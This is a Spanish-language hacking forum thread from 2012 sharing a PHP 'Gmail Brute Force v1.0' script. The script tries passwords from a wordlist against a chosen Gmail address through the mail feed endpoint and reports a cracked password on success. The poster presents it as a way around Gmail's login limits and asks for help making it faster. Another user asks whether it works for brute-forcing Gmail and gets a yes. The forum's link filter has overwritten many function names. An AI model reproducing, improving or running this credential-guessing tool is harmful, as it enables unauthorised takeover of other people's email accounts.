send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Gmail Brute Force v1.0 - Sec-w.com

  • 2 Respuestas
  • 2161 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« en: Octubre 09, 2012, 11:44:24 pm »
Últimamente estoy interesado en el tema de Fuerza Bruta a Correos Electrónicos,  el primero de mi lista es Gmail, así que he probado
algunas aplicaciones que realizan fuerza bruta como: Hydra, Brutus, Bruter entre otros.

Se sabe que Gmail solo te da 5 o 7 intentos para colocar tu passord, luego de eso te pide comprobaciones a través de códigos. así que de que
valdría hacer un ataque de Fuerza Bruta con un diccionario de 5 a 7 palabras por día (seria algo desesperante), pero aun no es el fin.
asi que para ese problema se podria utilizar cURL You are not allowed to view links. Register or Login con la cual los intentos de 5 a 7 para probar un posible password desaparecen.

Gmail Brute Force V1.0, Creada por s3n4t00r de sec-w.com hace posible esto:



lo he testeado y va bien, pero como ya saben no todo es fácil, los correos de Gmail que están protegidos por la famosa seguridad de
2 o 3 pasos (no recuerdo bien XD) <la cual es o consiste en enviarte o llamarte y facilitarte un código de (06) dígitos al un numero de
celular para confirmar el acceso de la persona legitima>; No son blancos para esta aplicación.

asi que sin mas preambulos les dejo el codigo:

Código: PHP
  1. <?php
  2.  
  3. /*
  4.  
  5.    author..............: s3n4t00r
  6.    home................: sec-w.com
  7.    Toolname............: Gmail Brute Force v1.0
  8.    Demonstration ......: http://youtu.be/QdEvoJdENBY
  9.  
  10.  
  11.  
  12. */
  13. You are not allowed to view links. Register or Login(0);
  14.  
  15. You are not allowed to view links. Register or Login ("
  16.  
  17. #---------------------------------------->
  18. # ToolName      : Gmail Brute Force v1.0
  19. #
  20. # Programmed    : s3n4t00r
  21. #
  22. # Home          : Sec-w.com
  23. #---------------------------------------->
  24. \n\n");
  25.  
  26.  
  27. if ($argc < 3)
  28. {
  29.             print "\nUsage......: php $argv[0] <mail> <list pass>\n";
  30.             print "\nExample....: php $argv[0] s3n4t00r@gmail.com pass.txt \n";
  31.             You are not allowed to view links. Register or Login();
  32. }
  33.  
  34.  
  35. function sws_gmail($mail,$pass){
  36.  
  37. $ch = You are not allowed to view links. Register or Login();
  38. You are not allowed to view links. Register or Login($ch, CURLOPT_URL, 'https://mail.google.com/mail/feed/atom');
  39. You are not allowed to view links. Register or Login($ch, CURLOPT_USERPWD, $mail.':'.$pass);
  40. You are not allowed to view links. Register or Login($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  41. You are not allowed to view links. Register or Login($ch, CURLOPT_SSL_VERIFYPEER, false);
  42. You are not allowed to view links. Register or Login($ch, CURLOPT_RETURNTRANSFER, 1);
  43. You are not allowed to view links. Register or Login($ch, CURLOPT_TIMEOUT, 4);
  44. $result = You are not allowed to view links. Register or Login($ch);
  45. $returnCode = (int)You are not allowed to view links. Register or Login($ch, CURLINFO_HTTP_CODE);
  46.  
  47. return $returnCode;
  48. }
  49.  
  50. You are not allowed to view links. Register or Login($mail, $list,) = You are not allowed to view links. Register or Login($argv[1], $argv[2]);
  51.  
  52. $lists = You are not allowed to view links. Register or Login($list);
  53.  
  54. foreach ($lists as $pass){
  55.  
  56.          $gmail = sws_gmail($mail,You are not allowed to view links. Register or Login($pass));
  57.          echo "[+]Testing -> ".$pass."\n";
  58.          if($gmail == '200'){
  59.  
  60.             echo "[+]Password Cracked -> ".$pass;
  61.             You are not allowed to view links. Register or Login("\n");
  62.          }
  63. }
  64.  
  65. You are not allowed to view links. Register or Login("# Failed");
  66.  
  67. ?>


Creditos: s3n4t00r

Saludos.

PD: si alguno de ustedes sabrían como mejorar el código, especialmente en la parte de rapidez en las comprobaciones
       de los password, seria algo genial.

Atte. Aryenal
« Última modificación: Octubre 25, 2013, 11:21:49 pm por Expermicid »

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Octubre 10, 2012, 01:49:39 am »
Entonces con esta aplicacion se podria hacer ataques de fuerza bruta en gmail?

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #2 en: Octubre 10, 2012, 03:20:36 pm »
You are not allowed to view links. Register or Login
Entonces con esta aplicacion se podria hacer ataques de fuerza bruta en gmail?
si.

 

¿Te gustó el post? COMPARTILO!